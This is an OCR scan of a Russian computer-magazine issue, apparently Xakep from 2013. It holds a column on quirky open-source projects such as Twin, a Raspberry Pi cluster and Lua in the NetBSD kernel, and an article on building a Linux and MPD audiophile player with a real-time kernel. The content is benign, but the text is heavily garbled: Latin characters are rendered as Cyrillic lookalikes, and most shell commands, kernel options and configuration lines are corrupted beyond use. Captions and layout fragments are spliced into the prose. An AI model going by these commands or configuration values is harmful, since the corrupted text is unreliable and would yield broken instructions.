универсальном средстве программирования лю- 
бого видеоадаптера в ядре І_іпих. 

Вся графическая система представляла со- 
бой небольшой модуль ядра, реализующий при- 
митивную оконную систему, и набор стандартных 
приложений, таких как часы, календарь, терминал 
и даже плеер МРЕС-2. В распоряжении програм- 
мистов также была библиотека ІіЬТЬиі для созда- 
ния собственных приложений. Назначение этой 
системы и ее преимущества перед классически- 
ми оконными системами в пространстве пользо- 
вателя так и остались непонятными. 

ТЕКСТОВЫЙ ОКОННЫЙ ИНТЕРФЕЙС 

Если графическая система в ядре І_іпих тебя 
не сильно впечатлила, то, может быть, впечатлит 
многооконная система, работающая в текстовом 
режиме? Еще в 1993 году Массимилиано Гиларди 
решил развить свои скиллы в программировании, 
написав оконную систему, работающую прямо 
в терминале Э08, то есть отрисовываемую только 
с помощью А8СІІ -символов без перехода в графи- 
ческий режим. На определенном этапе разработки 
он заметил, что однозадачный Э08 никак не может 
быть использован для запуска сразу нескольких 
приложений в разных окнах (а реализовать псев- 
домногозадачность а-ля ѴѴіпбоѵѵз 3.11 он не смог), 
и, раздосадованный, забросил проект. 

Но на этом история не закончилась. Открыв 
для себя многозадачный І_іпих в конце 90-х, Ги- 
ларди решил возобновить проект и начал про- 



цесс портирования Тѵѵіп в среду 1_іпих. В результа- 
те он довел самую бесполезную оконную систему 
в мире до очень приличного уровня развития. 
Последняя версия, выпущенная в 2012 году, по- 
ставляется с солидным набором приложений, 
поддерживает несколько типов раскладок окон, 
много опций конфигурирования, несколько одно- 
временных сессий с возможностью детачинга 
и многое-многое другое. 

Опробовать это чудо ты можешь практически 
в любом дистрибутиве, установив одноименный 
пакет. Рекомендую запускать в голой консоли, 
так как в иксах система задействует графические 
возможности для декорирования окон. В общем, 
прощайте, зсгееп и {плих, да здравствует Тѵѵіп! 

КЛАСТЕР ИЗ НА8РВЕППУ РІ 

Дешевый и расширяемый ПазрЬеггу Рі заработал 
огромную популярность среди гиков всех мастей. 
Одни используют его для управления световыми 
приборами, другие — для автоматизации при- 
готовления кофе, третьи — в качестве медиа- 
центра, а некоторые — для создания кластеров 
большой вычислительной мощности. Энтузиасты 
из Саутгемптонского университета сделали такой 
кластер из 64 плат ПазрЬеггу Рі и конструктора 
1-едо. 

Как и сам ПазрЬеггу Рі, кластер получился 
со всех сторон бюджетный. Специальные стойки 
не заказывали, а собрали из конструктора І_едо, 
для соединения задействовали обычный ЕШегпеІ- 
свитч, для питания использовали 13 удлинителей 
по пять розеток в каждом, в которые были вставле- 
ны недорогие 5-вольтовые блоки питания. Общий 
объем постоянной памяти кластера составил 1 Тб 
(64 80-карты по 16 Гб), а объем оперативной памя- 
ти — 1 6 Гб. Общая стоимость — 4 тысячи долларов. 

Для вычислений использован стандартный 
протокол МРІ и набор РуІЬоп-скриптов. Все ис- 
ходники, а также инструкции по сборке ребя- 
та выложили в Сеть ( аоо.аІ/ЛѴЦ ). Так что если 
у тебя появятся лишние четыре тысячи долларов 
и желание заиметь собственный кластер, то этот 
адрес тебе пригодится. 

ША В ЯДРЕ ОС 

И вновь о сумасшедших программистах из проек- 
та ІМеІВЗР. Кроме запуска ядра в браузере и порта 
на тостер, эти ребята решили воплотить в жизнь 
еще более сумасшедшую идею — встроить в ядро 
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Стандартная команда іор, запущенная на калькуляторе 



Интерфейс ГгатеЬиНег III явно уступает ѴѴіпсІоѵѵз ЫТ 






Этот безумный, безумный Ореп Зоигсе 
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Кластер 
изВазрЬеггу Рі 
на коленке 



скриптовый язык. Эта идея витала в сообществе ІМеИЗЗЭ 
еще с 2010 года, но только в начале 2013-го они наконец-то 
собрались с духом закоммитить наработки в ветку сиггепі:. 

Идея всего проекта в том, чтобы встроить в ядро 
минималистичный интерпретатор языка І_иа (который, 
кстати, называется 1_ипайк) и таким образом полу- 
чить возможность быстрой модификации частей ядра 
для проверки новых идей, конфигурирования подсистем 
ядра, эффективной разработки драйверов и тому подоб- 
ных вещей. Предполагается, что наличие І_иа в ядре также 
существенно снизит порог вхождения новых разработчи- 
ков в команду. 

Звучит, кстати, довольно здраво, особенно если учи- 
тывать, что І_иа — один из самых простых для изучения 
языков, а его интерпретатор — один из самых компактных. 
По этой причине 1_иа любят использовать в движках игр. И-И 



ШРО 



Последняя разработка Фа- 
бриса Беллара - реализован- 
ная софтверно базовая стан- 
ция 40 НЕ, которую может 
запустить любой желающий, 
обзаведясь средненьким ком- 
пом и дешевенькой антенной. 
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ДОЛГОЖДАННЫЙ РЕЛИЗ: 
ГГСЕЕВЗй 2.2.9 

Первого апреля 2006 года в мейл-листе РгееВЗЭ 
появилось сообщение о доступности для загрузки 
долгожданной РгееВЗЭ 2.2.9, выпущенной спустя 
семь с половиной лет с момента выхода версии 
2.2.8. Казалось бы, всего лишь одна из многочис- 
ленных гиковых шуток, однако выяснилось, что ре- 
лиз действительно существовал и его можно было 
загрузить с официальных РТР-серверов РгееВЗЭ 
Роипбайоп. 

Среди наиболее существенных изменений 
отмечались: переход на ХРгеевб версии 3.3.3, 
с улучшенной поддержкой 2Э-акселерации, под- 
держка Оиаке 2 в эмуляторе І_іпих, а также изме- 
нение кода драйвера ѵѵб(4), благодаря которому 
теперь обеспечивалась поддержка дисковых 
накопителей фантастического размера в 137 Гб! 
В планах на релиз 2.2.10 было избавление от де- 
стабилизирующих возможностей, типа разделяе- 
мых библиотек и модулей ядра, а в дальнейшем — 
долгожданное воссоединение с 386В30. 



ДЕСЯТЬ МЕСТ, ГДЕ ТЫ 
НЕ ОЖИДАЛ УВИДЕТЬ ШШ 

• Мотоцикл. Маѵігеп ТТХ02 — первый гоночный 
электромотоцикл, оснащенный бортовым 
компьютером, с помощью которого можно 
выполнять мониторинг работы систем байка 
и тюнинг. Поддерживается подключение че- 
рез ІІЗВ-порт или по ѴѴі-Рі. 

• Большой адронный коллайдер. Полностью 
управляется с помощью Ыпих-систем. 

• Система управления трафиком Сан- 
Франциско. Построена на базе машин с про- 
цессором Ргеезсаіе РоѵѵегОІІІСС II Рго и рабо- 
тает под управлением І_іпих. 

• Калькулятор ТІ ІМзріге САЗ СХ. Цветной экран 
320 х 240, 100 Мб внутренней памяти, 64 Мб 
оперативной. Операционная система Ыпих, 
языки программирования ТІ-ВАЗІС, І_иа, а так- 
же Си и ассемблер после джейлбрейка. 

• Управление воздушным трафиком. В 2006 
году Федеральное управление гражданской 
авиации США перевело все машины, управля- 
ющие воздушным трафиком, на Ыпих. 

• Поезда. Ыпих-система используется в Японии 
для управления прибытием и отправлением 
скоростных поездов. 

• Подводная лодка. В 2004 году компания 
І_оскІіееб Магбп спустила на воду атомную 
субмарину, все бортовые компьютеры кото- 
рой работают под управлением Веб Наі: Ыпих. 

• Доение коров. В 2005 году шведская компания 
ЭеІ_аѵаІ начала выпускать роботизированную 
технику для доения коров. Вся система рабо- 
тает под управлением Ыпих и индивидуально 
выбирает время доения для каждой коровы. 

• Биржа Нью-Йорка. Все машины, обслуживаю- 
щие Нью-Йоркскую фондовую биржу, работа- 
ют под управлением Ыпих. 

• Автомобили. В сентябре 2011 года Тоуоіа, 
ІМіззап, бадиаг и І_апб Воѵег вступили в со- 
став новой рабочей группы Аиіотоііѵе Сгабе 
Ыпих (АСЬ), которая занимается разработкой 
бортовых автомобильных систем на базе мо- 
бильной операционной системы Тігеп с ядром 
Ыпих и основанным на веб-технологиях интер- 
фейсом. 
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ПРИКЛАДНАЯ 

АУДИОФИЛИЯ 

Собираем звуковую станцию на базе Ыпих и МРИ 

В основе референсного аудиопроигрывателя Вгузіоп ВОР-2 стоимостью, на минуточку, 156 ты- 
сяч рублей лежит стандартная материнка с процессором Іпіеі Аіот и звуковой картой Е5І ииІі@ 
РСІ. В качестве ОС для этого плеера разработчики выбрали ОеЬіап Ыпих. При наличии времени 
и желания можно собрать аналогичный цифровой источник из имеющегося железа, а с установ- 
кой нужного ПО и тонкой настройкой параметров системы тебе поможет эта статья. 



ВВЕДЕНИЕ 

Надо сказать, при создании ВРР-2 инженеры из Вгузіоп 
не сильно утруждали себя работой над программной частью: 
в поставке идет стоковый ОеЬіап 6.0.1, ядро версии 2.6.32 
без поддержки геаШпле, предлагаются практически нетронутые 
настройки МРО, какие-либо оптимизации вовсе отсутствуют. 
Дело в том, что стандартные ядра имеют довольно большую за- 
держку звука (11-20 мс), и это не позволяет работать со звуком 
профессионально. В геаШте-системе эта задержка состав- 
ляет ~1 мс, что уже считается отличным результатом. Поэтому 
первым делом мы скомпилируем ядро и звуковой сервер МРй 
с РТ-патчами, чтобы максимально снизить задержки, затем 
настроим высокоточный таймер событий, выставим макси- 
мальные приоритеты для устройств и процессов, связанных 
с передачей аудио, и проведем тюнинг системных параметров. 
В общем, сделаем то, что должны были сделать Ьі-епсі’овцы. 

Будем рассматривать на примере древнего компа (мате- 
ринка ѴІА Еріа-М8, проц ѴІА СЗ 800 МГц, 512 Мб ОЗУ, звуковая 
карта ЕЗІ ЗиІі@ РСІ) и дистрибутива ОеЬіап 7.1, установленного 
по минимуму, то есть без графики и лишних сервисов. У тебя 
может быть другая звуковуха, только мы бы рекомендовали 
именно РСІ/РСІ-Е, поскольку внешние карты 115В могут некор- 
ректно работать с некоторыми материнскими платами. 

КОМПИЛЯЦИЯ ПТ-ЯДРА 

ВТ-патч предназначен для поддержки реального времени 
в ядре, причем не «мягкого», а «жесткого». Разница заключает- 
ся в том, что системы «мягкого» реального времени допускают 
небольшое превышение желаемого времени выполнения, в си- 
стемах же «жесткого» реального времени подобное превыше- 
ние недопустимо. Патч накладывается на ванильное ядро, по- 
этому ставим все необходимое для его компиляции и качаем 
ядро и патч: 

# ар~Е-§е1: іпзііаіі кегпеі-раска^е ІіЬпсигзезБ-сІеѵ <-■ 

-Ракегооі: Ьиі1сІ-е55еп1=іа1 рк^-сопб^ у^еЬ ^сс <-■ 
аігЕасоггГ діі: 

# шксііг кегпеі && ссі $ 

# м§е1: Ьг Е . 1ѵ /149сИ0п 

# мдеі: ЬгЕ.1у/14гРВѵО 



о 

Роман Ярыженко 

готтапіо@уапс!ех.ги 




Андрей Матвеев 

апс!гизЬоск@геаІ. хакер, ш 







Распаковываем и патчим: 

# Ьаг хі-Р 1іпих-3.8.13.1=аг.Ь22 && ссі 1іпих-3.8.13 

# Ьгсаі: . . /раіісіп - 3 . 8 . 13 - гіііі . раІісИ . Ьг2 | раіісіі -рі 



На прилагаемом к жур- 
налу диске ты найдешь 
исходники МРй с нало- 
женным РТ-патчем. 



Затем в теписопТід/псопІід включаем опцию Ргосеззог іуре 
апсі ^еаШгез — ► Ргеетрііоп МосІеІ — > РиІІу РгеетрйЫе Кегпеі (ВТ) 
и собираем ядро: 

# СОІМСІЖЕІМСУ І_ЕѴЕІ_=3 -Ракегооі: таке-крк^ - -±п±1=гсІ <-■ 
--аррепсІ-1:о-ѵеп5Іоп=-г1: кегпеі іта^е <-» 
кегпеІЬеасІепБ 



Вместо СОМСІІВЕІ\ІСѴ_І_ЕѴЕІ_=3 можешь поставить свое число, 
в зависимости от количества ядер процессора + 1 . 
Устанавливаем и перезагружаемся: 

# сірк^ -і . . /* . сІеЬ 

# геЬооІ: 



ПОДГОТОВКА МРй 

Для начала — что это такое? Зачем нужен еще один плеер, если 
их и так предостаточно? Собственно, МРО — демон с клиент- 
серверной архитектурой, что открывает довольно любопытные 
возможности, а именно: 

# в отличие от множества других графических плееров, 
он прекрасно обходится без иксов, так что, если они упали 
или вообще отсутствуют на компе, музыка все равно будет 
играть; 

# это клиент-серверное приложение — при желании им мож- 
но управлять из графического интерфейса; 

# МРР мало того что клиент-серверный — он еще и сетевой! 
Следовательно, его можно поставить на безголовый сервер 
и спокойно рулить им с любого устройства — хоть с нетбука, 
хоть с другого компа, хоть со смартфона или планшета (ІОЗ/ 
АпсІгоісІ). 

Сам же МРй имеет множество возможностей, в том числе 
поддержку РЬАС, АІ_АС, ѴѴАѴ, МРЗ, ОСС, потокового воспроиз- 
ведения аудио, даріезз рІауЬаск (воспроизведение без пауз)... 
всего не перечислишь. 

Исходники берем с официального сайта (по указанным 
ниже причинам необходима версия 0.17.1), затем ставим необ- 
ходимые зависимости для сборки: 

# іл/^еі: ЬгЕ. 1ѵ/14ыхР1:і 

# 1:аг хіѵ-р трсІ-Ѳ.17.1.1:аг.Ь22 

# ССІ тргі-Ѳ.17.1 

# арі-^еі: Ьиіісі-сіер трсі 

# арі-деі іпзііаіі ІіЬссІіо-рагапоіа-сІеѵ 



120 



ІІпіхоШ 
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После этого можно, в принципе, заходить в каталог и наби- 
рать команду аиіодеп, а затем таке... но мы торопиться не бу- 
дем, поскольку в противном случае МРй будет скомпилирован 
с опциями по умолчанию, что нам может не подойти. Кроме 
того, придется применять ВТ-патч к самому МРй, который 
предназначен для улучшения качества звука путем управления 
приоритетами потоков (зря, что ли, РТ-ядро компилировали?). 
Поскольку сам плеер развивается быстрее, чем патч, версия 
МРй должна быть именно 0.17.1 . Скачиваем патч и накладыва- 
ем его: 

# ы^еі: Ы1= . Іѵ/ІѲкЬзНУ -0 трсІ-гЕорІі.сІі-р-Р.^г 

# §ип 2 Ір -с трб-г 1 :ор 1 :.сІі-Р-Р .§2 | раіісіі -рі 

Теперь уже можно выбирать опции сборки. Конечно, это 
дело вкуса, но мы собирали со следующими опциями: 

# ./аиІіо^еп.БІі СГІ_А65="-02 -ш1:ипе=^ ипате -ітГ" <-■ 
--епаЬІе-аІза --епаЫе-г1=ор1= --епаЬІе-ісІЗ <-■ 
--епаЫе-5д1і1=е --епаЬІе-аисІіо^Іе --епаЫе-Лас <-■ 
--епаЬІе-ссІіо-рапапоіа --епаЫе-І5п <-■ 
--сІІ5аЫе-055 --сІІБаЫе-риІБе --сІізаЫе-іаск <-■ 
--сііза Ь іе-ірѵб - - сііз а Ь 1 е-іпоІіі-Рѵ 



# таке && таке іпзііаіі 



Рассмотрим некоторые опции подробнее: 

--епаЫе-аІза — включает поддержку АІ_5А; 
--епаЫе-гЬор-Ь — собственно, то, ради чего мы патчили; 
--епаЬІе-ісІЗ — поддержка тегов ЮЗ; 

--епаЫе-5д1і1:е — поддержка ЗОІЛе для внутренней БД 
МРй; 

--епаЬІе-аисІіоІіІе — поддержка ѴѴАѴ-файлов; 

- -епаЫе-Пас — поддержка РІ_АС — формата сжатия без по- 
тери качества; 

--епаЬІе-ссІіо-рагапоіа — аудиоСй; 

- -епаЫе- І5г — поддержка изменения частоты дискретиза- 
ции на лету; 



# --сІІБаЫе-озз — поскольку мы будем использовать АІ_5А, 
033 нам не понадобится; 

# --сІізаЫе-риІБе, --сІІБаЫе-заск — обертки вокруг АБЗА 
нам тоже ни к чему; 

# --сІізаЫе-ірѵб — если нет ІРѵб, зачем его включать? 

# --сІІБаЫе-іпоІіі-Ру — для меньшего потребления ресурсов. 

А теперь, после успешной сборки и установки, давай перей- 
дем к настройке аудиосистемы. 

НАЧАЛЬНАЯ НАСТРОЙКА И ТЮ Н И Н Г 

Приведем наиболее важные части файла трсі . соп-Р: 

# Каталог с музыкой. Вложенные подкаталоги 

# также поддерживаются 

тизіссіігесііогу "/ѵаг/трсІ/ти5Іс" 

# Плей-листы 

рІаѵІІБІ: сіігесііогѵ "/ѵаг/трсІ/р1І5І:5" 

# База данных с тегами 

сІЬ біе "/ ѵа г /трсі /трсі сІЬ" 

# Еще одна база данных - на этот раз 

# для пользовательской информации о музыке 

Біііс кег бі е м /ѵ аг/трсІ /5І=іс кег сІЬ" 

1о§_б1е "/ѵаі71о§/трсІ. 1о§" 

# Настройка для Е5І ЗиІКа), подключенной по 5РРІР 

# (ТоБІіпк либо КСА) к внешнему ЦАП 

# Конфигурация аудиовывода - почти единственный 

# многострочный параметр в трсі. соп-р. Возможно 

# использование одновременно нескольких 

# аудиовыводов 

аисііо оиііриі: I 

# Указываем, что будем использовать АІ.5А 

*уре "аІБа" 

# Название конфигурации 

пате "Е5І Зиііа 5РРІР" 

# Используем цифровой выход (для получения 

# информации о звуковой карте смотри вывод 

# команды аріаѵ -Р 



К 

Подопытный комп, ана- 
логовая часть ЕЗІ ОиІі@ 
демонтирована 

Для тестов использо- 
вался цифро-аналого- 
вый преобразователь 
Ыадга ОАО 



Чтобы получить Ыі-рефсі 
рІауЪаск, запрещаем звуковой 
подсистеме самой выравни- 
вать громкость, изменять 
частоту дискретизации, из- 
менять количество каналов 
и выполнять преобразование 
разрядности аудиопотока 



ОПТИМАЛЬНЫЕ НАСТРОЙКИ ВЮЗ 

Приведем несколько настроек ВЮЗ, которые рекомендуется подправить 
для улучшения производительности: 

• Если имеется НурегТНгеасІіпд, лучше его отключить. 

• Ѵібео ВЮЗ зііасіоѵѵ тоже лучше отключить. 

• Для устройств РСІ выключи опцию РСІ йеіау Тгапзасііоп, поскольку она уве- 
личивает задержки. 

• Отключи все ненужные встроенные устройства. 
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.согѵ^іё - Ипих/і386 3.8.13 Кегпеі СоітНёигаІіоп 



Ргеетрііоп Мосіеі 

ІІзе ІІпе аггош кеуз Іо паѵіёаіе ІІііз шіпсіош ог ргезз ІЬе Иоікеу оі 
ІЬе Нет уои шізМ Іо зеіесі: {оііошесі Ьу ІЬе <5РАСЕ ВАР>. Ргезз 
<?> {ог асісІШопаІ ігѵРоптаІіоп аЬоиІ: Шз орііоп. 



( ) Мо РогсесІ Ргеетрііоп (Зегѵег) 

( ) Ѵоіипіагу Кегпеі Ргеетрііоп Шезкіор) 

( ) РгеетрІіЫе Кегпеі (І_ош-1_а{епсу Оезкіор) 
( ) РгеетрІіЫе Кегпеі (Вазіс КТ) 



ІГиІІу РгеетрІіЫе Кегпеі (КТ) | 



< Неір > 



сіеѵісе "іес958:САКР=Зи1і.РЕѴ=0" 

# Чтобы получить ЬгЕ-регРесС рІаѵЬаск. 

# запрещаем звуковой подсистеме автоматически 

# выравнивать громкость, изменять частоту 

# дискретизации, изменять количество каналов 

# и выполнять преобразование разрядности 

# аудиопотока 

гер1а ѵ_^аіп ІіапсІІег Чюпе" 

аиііогезатріе "по" 

аи1=о_сІіаппеІ5 "по" 

аи1=о_-Ро гта{: "по" 

# Поддержка Метогѵ-тарріп^ 1/0 

изеттар "уез" 

# Выставляем максимальный приоритет 

рпіогіііѵ "РІР0:99" 

} 



I 4 

Выбор нужной опции 
ядра 

Конфигурационный 
файл трсі.соггі 



# Размер внутреннего аудиобуфера в килобайтах 
аисііо Ьи-р-Рег зіге "204 8" 

# Заполнение аудиобуфера перед проигрыванием 

# музыки в процентах 

Ь и-р-Рег Ье-Роге ріаѵ "50%" 



# Конфигурация геаііііте-опций МРР - второй 

# многострочный параметр в данном файле 

геаГЕіте_ор - Еіоп I 

тетіоск "ѵез" # Поддержка Іоскз іп-тетогѵ 

# Резервируем стек (в килобайтах 1 ) 

зііаск гезепѵе "1024" 

# и кучу (также в килобайтах’) 

Иеар гез егѵе "1 0240" 

шаіп рпіогіііѵ "ОТНЕК:0" 
ріаѵеп ргіопіііѵ "РІРО:50" 
сіесосіег ргіог іі іѵ "РІР0 :47" 

# Приоритеты потоков 

ирсіаііе ргіопіііѵ "ОТНЕК:0" 

} 



По желанию (и если МРй был скомпилирован с соответству- 
ющей опцией) можно, например, включить потоковое аудио 
по НТТР — для последнего надо добавить следующие строчки 
в конфиг: 

аигііо_оігЬри1: { 

1=уре "Іі1=1=рсІ" 

пате "М у НТ ТР 51:ге ат" 

# Используемый кодек, может быть ѵогЬіз 

# или Іате 

епсосіег "ѵогЬіз^ 

рогЕ "800 0" 

# диаііііѵ "5.0" 

# Параметры диаііііѵ и ЬгЕга~Ее взаимоисключающие 




ЩРО 

Перед сдачей номера 
в печать нам удалось 
выяснить, что ядро, 
используемое в Вгузіоп 
ВОР-2, скомпилировано 
с опцией С0МРІС_ 
РКЕЕМРТ_ѴОШІМТАКѴ, 
позволяющей умень- 
шить Іаіепсу и повысить 
отклик программ, когда 
система находится под 
нагрузкой. Это не режим 
жесткого реального вре- 
мени, но хоть какая-то 
отдушинадля владель- 
цев столь дорогостояще- 
го плеера. 




Ьіішаііе "128" 

# Формат аудиопотока (44 Л кГц, 16 бит. 

# стерео’) 

Тогтаі "44100:16:2" 

} 



Также необходимо произвести тюнинг системы. Первым 
делом создаем файл /еіс/зесигііу/ІітіІіБ.сІ/трсІ со следую- 
щим содержанием: 

(Эаисііо - г іргіо 99 

(Эаисііо - тетіоск ипіітіііесі 

(Эаисііо - пісе -19 

Этот файл практически выключает ограничения приорите- 
тов для демона. Далее необходимо изменить настройку НРЕТ 
(который является генератором тактовой частоты и на многих 
довольно старых материнских платах по умолчанию не исполь- 
зуется). Для этого правим строку в файле /е1:с/сІе-Раи11:/§гиЬ — 
заодно добавим опцию ІІігеасІігдз, которая имеет отношение 
к ПТ-ядру и которая понадобится в дальнейшем: 

6КЦВ_СМРІ_ІМЕ_І.ІІ\ІЦХ_РЕРАЦІ.Т="диіе1: с!оскзоигсе=<м 
НреТ ІгИгеасІігдз" _ 

НРЕТ необходим для более точной (по времени) подачи 
сигнала на ЦАП. Казалось бы, разница в несколько микро- 
(а то и нано-) секунд при подаче потока битов настолько незна- 
чительна, что на нее не стоит обращать внимания... ан нет. Один 
бит задержался, два пришли раньше времени — и в высоко- 
классной стереосистеме разница может быть ощутима челове- 
ческим ухом. С использованием НРЕТ вероятность подобного 
сценария уменьшается. 

Давай также настроим некоторые параметры ядра через 
зузсіі. Открой в своем любимом редакторе /еііс/зузсііі.соп-р 
и добавь в него следующие строчки: 

# Настройки виртуальной памяти, в частности 

# стратегия распределения памяти и коэффициент 

# подкачки 

ѵт.оѵегсоттіі: тетогу = 2 

ѵт . оѵег соттііігаіііо = 50 

ѵт. 5марріпезз = 10 .И » 7 і д . 

# Настройка максимально допустимой частоты НРЕТ 
сіеѵ . Ііре1: .тах-и 5ег- -Ргед = _2048 









ігг 



ІІПІХОШ 
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Если у тебя РСГная карта, то надо уве- 
личить до максимума таймер времени 
ожидания, задающий время, которое 
может занимать карта на шине 



В дополнение к последнему параметру необходимо изме- 
нить подобный же для гіс — но, поскольку он находится в зузТз, 
придется прописывать его в гс . Іосаі: 

есііо 2048 > /зѵз/сІазз/гІіс/гІісѲ/тах иБег -Ргед 

Поставим пакет г*і^-іпі*. Он содержит скрипт, увеличи- 
вающий приоритеты ІРЮ-потоков, связанных со звуковым обо- 
рудованием: 



ге. Для некоторых плееров необходимо также указывать файл 
трсі.одд — например Нир://192. 168.1 .5:8000/трсІ.одд. 

УДАЛЯЕМ ЛИШНЕЕ 

Ну а теперь необходимо подчистить систему. В общем-то, 
ты можешь это сделать и сам, но есть некоторые тонкости — 
к примеру, пакеты, установленные с помощью ар* -ее* Ьиіісі- 
сіер, удалить не совсем просто. Итак, сначала мы отмечаем 
нужные для МРй пакеты, чтобы они не удалились следующей 
командой, а уже затем удаляем пакеты, относящиеся к сборке: 

# ар*-тагк тапиаі ІіЬссІіо-рагапоіаІ <-■ 

1іЬаѵаІіі-§1іЫ 1іЬсиг13-§пи*І5 1іЬ5Ііои*3 

# ар*-|ге* аи*огетоѵе кегпеі-раска^е <-■ 
ИЬпсигзезБ-сІеѵ -Ракегоо* Ьиіісі-еззепіііаі <-■ 
рк§-соп6§ м%е* %сс аи*осоп-Р %і* 

# ар*-|ге* гетоѵе ИЬссІіо-рагапоіа-сІеѵ 

Затем выполняем следующую трехэтажную команду: 



# ар*-%е* Іп5*а11 г*ігд-іпі* 

После установки, возможно, потребуется отредактировать 
файл /е*с/сІе-Раи1*/г*ігд, а именно список ІРЮ-потоков, кото- 
рые будут иметь повышенный приоритет: 

КТІК0_МАМЕ_ІІ5Т="г*с зпсі изЬ І8Ѳ42" 

Ну и напоследок — если у тебя РСГная звуковая карта, то надо 
увеличить до максимума таймер времени ожидания (Іаіепсу 
Ііплег, задающий время, которое может занимать карта на шине, 
если к шине обращаются другие карты) для нее и, соответствен- 
но, немного увеличить его для других устройств РСІ. Но сперва 
надо узнать РСІ ГО карты: 

# І зрсі | ^ге р -і аисііо 

В моем случае ГО был 01:09.0, следовательно, для увеличения 
Іаіепсу Иплег набираем команды 

# 5е*рсі -ѵ -сі *:* 1а*епсѵ_*ітег=ЬѲ 

# зе*рсі -ѵ -з 01:09.0 1а*епсу *ітег=-р-р 

Эти команды ты тоже можешь прописать в гс. Іосаі. 

ПРОВЕРКА РАБОТОСПОСОБНОСТИ 

В общем-то, теперь можно запускать демон МРЭ. Перед за- 
пуском убедись, что музыка в соответствующем каталоге при- 
сутствует и создан каталог для плей-листов. Если же она раз- 
бросана по разным каталогам, то можно указывать на них 
симлинками. Команда для ручного запуска выглядит так: 



# ар* -ее* гетоѵе $(ар*-сас!іе зіірызгс "трсі" | <-■ 
^гер Виіісі-Ререпсіз | регі -р -е 'з/(?:[\<-< 
ГП- + ?ГМЛ ІВиіІсІ-РерепсІз: | . МШе') 




# трсі /е*с/трсІ.соп-Р 



Интерфейс ОМРОСІіепІ 



А как же проверить работоспособность? Дело в том, что даже 
самый простой консольный клиент в состав исходников МРЭ 
не входит, как и библиотека ІіЬтрсІсІіеп*, поэтому можно либо 
скомпилировать их самостоятельно, либо установить соот- 
ветствующий пакет. Поскольку клиент не требует наложения 
патчей, то особого смысла заморачиваться с компиляцией нет, 
а значит, ставим пакет: 

# ар*-§е* іпз*а11 трс 

Перед запуском рекомендуем посмотреть настройки микше- 
ра — в ЭеЫап 7. 1 звук по умолчанию отключен. Обновляем базу 
данных МРЭ, добавляем всю музыку в плей-лист и запускаем 
воспроизведение: 

# трс ирсІа*е - -шаі* 

# трс 1і5*а11 | трс асісі 

# трс ріаѵ 

Если все нормально, то должна зазвучать музычка. В случае же 
потокового воспроизведения тебе надо еще проверить работу 
этого потока. Указываем адрес и порт, прописанный в конфи- 



[$опа(а] 7207. трЗ 

ІКМ | ЭДІ | 0:47 / 38: 

„ 7207. трЗ 

от Неизвестно из Неизвестно 



В ротации ^ Фонотека | ■г Списки | Ш Потоки | ^ Информация | 



Исполнитель - Дорожка 


Длина 


ц 


1 9854.трЗ 


4:11 




Ь533а44104<і3.тр3 


7:54 




Дорожка 5.трЗ 


3:50 




Неизвестно - Тгаск 2 


3:04 




7207. трЗ 


38:16 




Могіп, СугіІ - СІогіоиз Коте 


1:33 





СІіпі МапзеІІ (Реаіигіпв Кгопоз риаггеі) - І.их Аеіе... 


23:10 


2\ 


Пргііпрг РНіІЬягтппікрг гпп НргЬргТ ипп Кдгдіап - " 


57-ПЧ 




Зопаіа — еще один клиент для МРР 







ХАКЕР 08 /175/ 2013 



Прикладная аудиофилия 



ігз 



Л .МТ5РЦ5 36 9:52 


1СЮ%Ш> 


Аііізів 


ЧГ 


Е 


0 


Египта ЗНаррНп 




2 аІЬшпз 






пріоасі 

1 аІЬигп 



Ш г? Ф Р *" 

Мотд» РІлуіпд Агіі^і АІЬигп $рпд Мпгс 



Т .ііі <9 20:31 

Ш Проигрывается 



СІогіоиз Йоте 

Могіп, СугІІ 

Вог^іа Л 

01/32 



Н II 

\ ш 






МОНТИРОВАНИЕ КОРНЕВОЙ 
ФС В РЕЖИМЕ КО 



Если музыка у тебя будет находиться на ином нако- 
пителе, нежели система, имеет смысл при загруз- 
ке монтировать корневую ФС в режиме геасі опіу. 
Наиболее простой способ сделать это — прописать 
соответствующую опцию в /е*с/-р5*аЬ. Однако это 
потребует размещения всех изменяемых частей 
на других разделах либо удаления программ, кото- 
рые эти данные генерируют, что иногда не совсем 
просто. 

Еще один способ заключается в использо- 
вании ипіоп^з/аиІъ/оѵегІауТз — эти файловые 
системы позволяют объединять в одной точке 
монтирования и НО, и НѴѴ — последняя может раз- 
мещаться в оперативной памяти. Данная техника 
используется при создании І_іѵе-дистрибутивов. 
Подробнее о том, как это сделать, можно узнать 
тут: 



Команда эта выглядит пугающе, но делает вполне безобидную 
вещь — удаляет все пакеты, которые нужны были для сборки 
МРй. Удаляем также МТА — зачем нам почта на аудиостанции? 

• ар1:-§е1: гетоѵе ехіт 

В общем-то, остальные бесполезные для аудиостанции пакеты 
ты можешь удалить и сам. Но если ты не уверен, понадобится 
ли тебе, к примеру, сгоп или зузіод, — лучше их просто отклю- 
чить из іпЦ-скриптов. 

КЛИЕНТЫ ДЛЯ МРБ 

Есть ли для МРО другие клиенты? Конечно, есть. Более того, на- 
личие множества клиентов — одна из особенностей этого де- 
мона. Некоторые из них опишем чуть подробнее. 

• Ысплрс — довольно простой клиент для МРО, основанный 
на псигзез. К сожалению, не очень удобно работать с плей- 
листами. 

• А вот еще один клиент на псигзез — пстрсрр в этом смысле 
куда более приятен. В нем имеется поиск по тегам. 

• Клиент для хТсе, хТплрс, отличается присущей этой среде 
минималистичностью и отсутствием лишних функций. 

• Еще один графический клиент, Зопаіа, позволяет, кроме 
всего прочего, загружать из интернета обложки альбомов 
и тексты песен и обладает большим количеством настро- 
ек. Поддерживает работу с несколькими серверами МРО. 
Правда, вызывается окно настроек не слишком интуитивно. 

• ОМРОСІіепІ:, как понятно из названия, является 01-клиентом 
и на вид очень мощный плеер — но не особо впечатлил. Тем 
не менее отметим такую возможность, как автоматическое 
удаление уже сыгранной композиции из плей-листа. 

Отдельно стоит упомянуть клиенты для коммуникаторов. 
Для АпсІгоісІ в Соодіе РІау нашлись МРйгоісІ и ОгоісІМРО. Какой 
из них выбрать — дело вкуса; интерфейс второго показался не- 
сколько аляповатым. Для іРТіопе/іРосІ пользуется популярно- 
стью МРоР, для іРасІ есть специализированная версия — МРаР. 

ОКОЛОАУДИОФИЛЬСКИЕ ДИСТРИБУТИВЫ 

Существует множество дистрибутивов для работы со звуком — 
от минималистичных, для работы исключительно в качестве 
аудиоцентра без монитора с управлением по сети, до наво- 
роченных, имеющих кучу секвенсоров и ѴЗТ-плагинов. Все их, 
конечно, описать невозможно, но небольшой обзор отдельных 
не помешает. И начнем мы с Ѵоуаде МРР. 



Ѵоуаде МРй 

